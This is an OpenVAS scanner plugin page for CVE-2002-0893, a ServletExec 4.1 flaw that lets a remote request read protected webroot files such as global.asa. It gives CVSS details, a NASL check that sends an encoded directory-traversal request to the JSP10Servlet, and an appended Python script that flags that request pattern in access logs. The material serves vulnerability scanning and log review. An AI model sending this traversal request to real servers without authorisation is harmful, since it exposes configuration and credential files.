openvas | Copyright (C) 2002 Matt Moore | OPENVAS:136141256231010959
History: Nov 03, 2005 - 12:00 a.m.

ServletExec 4.1 ISAPI File Reading

2005-11-03 00:00:00
plugins.openvas.org

CVSS2: 5
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score: 6.5 (Confidence: Low)
EPSS: 0.004 (Percentile: 75.1%)

By invoking the JSPServlet directly, it is possible to read the contents of
files within the webroot that would not normally be accessible (global.asa, for example).

# SPDX-FileCopyrightText: 2002 Matt Moore
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.10959");
  script_version("2023-08-01T13:29:10+0000");
  script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_cve_id("CVE-2002-0893");
  script_name("ServletExec 4.1 ISAPI File Reading");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2002 Matt Moore");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_xref(name:"URL", value:"ftp://ftp.newatlanta.com/public/4_1/patches/");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/4795");
  script_xref(name:"URL", value:"http://www.westpoint.ltd.uk/advisories/wp-02-0006.txt");

  script_tag(name:"solution", value:"Download Patch #9 from the linked vendor FTP.");

  script_tag(name:"summary", value:"By invoking the JSPServlet directly it is possible to read the contents of
  files within the webroot that would not normally be accessible (global.asa, for example.)");

  script_tag(name:"insight", value:"When attempting to retrieve ASP pages it is common to see many
  errors due to their similarity to JSP pages in syntax, and hence only fragments of these pages
  are returned. Text files can generally be read without problem.");

  script_tag(name:"qod_type", value:"remote_vul");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");

port = http_get_port(default:80);

# Uses global.asa as target to retrieve. Could be improved to use output of webmirror.nasl
url = "/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa";
req = http_get(item:url, port:port);
res = http_keepalive_send_recv(port:port, data:req);
if(!res)
  exit(0);

if("OBJECT RUNAT=Server" >< res) {
  report = http_report_vuln_url(port:port, url:url);
  security_message(port:port, data:report);
  exit(0);
}

exit(99);
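
For reviewing web server logs for the request pattern this plugin sends, the following is an added example (not part of the OpenVAS plugin or the original page). It assumes Common Log Format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Servlet path taken from the plugin's probe URL, lower-cased for comparison.
SERVLET_PREFIX = "/servlet/com.newatlanta.servletexec.jsp10servlet/"
# Request field of a Common Log Format line: "METHOD target PROTOCOL".
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')


def fully_decode(target, max_rounds=3):
    """Percent-decode until stable so nested encoding cannot hide a separator."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def is_traversal_probe(target):
    """True if the request calls JSP10Servlet directly and climbs directories."""
    path = fully_decode(target.split("?", 1)[0]).lower().replace("\\", "/")
    if not path.startswith(SERVLET_PREFIX):
        return False
    # Any ".." segment after the servlet name leaves the servlet's own path.
    return ".." in path[len(SERVLET_PREFIX):].split("/")


def scan(lines):
    """Return (line_number, request_target) for each matching log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match and is_traversal_probe(match.group(1)):
            hits.append((number, match.group(1)))
    return hits


# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2023:13:29:10 +0000] "GET /index.jsp HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Aug/2023:13:29:11 +0000] "GET /servlet/com.newatlanta.'
    'servletexec.JSP10Servlet/..%5c..%5cglobal.asa HTTP/1.1" 200 904',
    '192.0.2.12 - - [01/Aug/2023:13:29:13 +0000] "GET /servlet/com.newatlanta.'
    'servletexec.JSP10Servlet/hello.jsp HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for number, target in scan(SAMPLE_LOG):
        print(f"line {number}: {target}")
```

A hit with a 200 status and a non-trivial response size deserves a closer look, since the plugin itself only reports when the response body contains `OBJECT RUNAT=Server`.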
